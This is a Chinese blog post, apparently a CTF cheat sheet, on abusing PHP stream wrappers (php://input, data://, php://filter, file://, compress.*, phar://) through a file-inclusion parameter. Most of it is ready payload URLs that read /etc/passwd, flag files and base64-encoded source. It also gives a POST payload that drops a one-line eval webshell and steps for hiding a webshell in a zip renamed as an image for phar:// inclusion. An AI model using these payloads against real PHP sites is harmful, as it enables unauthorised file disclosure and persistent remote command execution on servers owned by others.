PHP伪协议读取文件

11111111in2025-04-21 10:40

借鉴php伪协议实现命令执行,任意文件读取_ctf php文件读取-CSDN博客

总结

在ctf中常用的有data:// , php://input , php://filter ,file://

php://input ,data://用来执行命令

1.php://input 的用法

http://127.0.0.1/include.php?file=php://input

POST DATA部分

<?php phpinfo(); ?>

2.data://用法

http://127.0.0.1/include.php?file=data://text/plain,\<?php%20phpinfo();?>

php://filter,file://用来读取文件

3.php://filter用法

http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(读取php文件需要先加密以下才能读出来,并且拿到的源码需要进行base64解码下)

http://127.0.0.1/include.php?file=php://filter/resource=/flag

4.file://用法

http://127.0.0.1/include.php?file=file://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.txt

file://协议

file://协议通常用于从本地文件系统读取文件内容

基本原理

  • file://协议 :这是用于访问本地文件系统的协议。例如,file:///etc/passwd会尝试访问Linux系统上的/etc/passwd文件。

例如http://example.com/include.php?file=file:///etc/passwd

用法

/path/to/file.ext

relative/path/to/file.ext

fileInCwd.ext

C:/path/to/winfile.ext

C:\path\to\winfile.ext

\\smbserver\share\path\to\winfile.ext

file:///path/to/file.ext

示例:

1.file://[文件的绝对路径和文件名]

http://127.0.0.1/include.php?file=file://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.txt

2.file://[文件的相对路径和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://网络位置和文件名

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

php://协议

php://协议是一种非常有用的功能,可以用来读取文件、输入流等。php提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流,标准输入输出流和错误描述符

常见的 php:// 协议

  1. php://input
    • 用于读取原始的POST数据。
    • 在某些情况下,可以用来绕过一些文件上传的限制。
  2. php://filter
    • 用于读取文件内容并进行过滤(如base64编码、解压缩等)。
    • 语法:php://filter/read=filter.name/resource=file
    • 例如:php://filter/read=convert.base64-encode/resource=flag.php 可以将 flag.php 文件的内容以base64编码形式输出。
  3. php://fd (PHP 7.0.0+):
    • 用于直接访问文件描述符。
    • 通常不常用在CTF中,但了解其存在有助于理解PHP的文件操作。
  4. php://memoryphp://temp
    • 用于在内存或临时文件中读写数据。
    • 这些协议通常用于数据处理或流操作,不常用于直接读取文件。
php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]
php://filter/resource=[文件名]

php://input的使用

http://127.0.0.1/include.php?file=php://input

POST DATA部分

<?php phpinfo(); ?>

执行一句话木马

http://127.0.0.1/include.php?file=php://input

POST DATA部分

<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

data://协议

data://text/plain, ???

http://127.0.0.1/include.php?file=data://text/plain,\<?php%20phpinfo();?>
?page=data://text/plain;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=

zip:// & bzip:// & zlib:// 协议

作用:

zip:// & bzip:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可以修改为任意后缀名,如 jpg,png,gif,xxx等

compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2 并上传(同样支持任意后缀名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.bz2

3.compress.zlib://file.gz

压缩phpinfo.txt 为phpinfo.gz 并上传(支持任意后缀名)

http://127.0.0.1/include.php?file=compress.zlib://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.gz

phar://协议

  • php解压缩包的一个函数,不管后缀是什么,都当作压缩包来解压。

  • 格式:

    ?file=phar://压缩包名/内部文件名
    例:phar://x.zip/x.php
    步骤:写一个一句话木马shell.php,然后用zip协议压缩为shell.zip,
    再将后缀改为png等其他格式

相关推荐
ServBay16 分钟前
垃圾堆里编码?真的不要怪 PHP 不行
后端·php
用户962377954483 小时前
CTF 伪协议
php
BingoGo2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端
BingoGo3 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进
后端·php
JaguarJack3 天前
OpenSwoole 26.2.0 发布:支持 PHP 8.5、io_uring 后端及协程调试改进
后端·php·服务端
JaguarJack4 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包
后端·php·服务端
BingoGo4 天前
推荐 PHP 属性(Attributes) 简洁读取 API 扩展包
php
JaguarJack5 天前
告别 Laravel 缓慢的 Blade!Livewire Blaze 来了,为你的 Laravel 性能提速
后端·php·laravel
郑州光合科技余经理6 天前
代码展示:PHP搭建海外版外卖系统源码解析
java·开发语言·前端·后端·系统架构·uni-app·php
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05OpenClaw优化飞书API 额度已耗尽问题06Window 10部署openclaw报错node.exe : npm error code 12807Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤08小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09OpenClaw大龙虾机器人完整安装教程10网站改了域名,如何查找?